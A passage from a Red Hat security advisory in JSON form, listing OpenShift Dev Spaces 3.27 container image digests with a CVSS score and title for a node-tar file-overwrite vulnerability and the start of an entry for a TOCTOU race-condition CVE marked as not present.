"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives"
},
{
"cve": "CVE-2026-23950",
"cwe": {
"id": "CWE-367",
"name": "Time-of-check Time-of-use (TOCTOU) Race Condition"
},
"discovery_date": "2026-01-20T02:00:55.870044+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64"
]
}
],
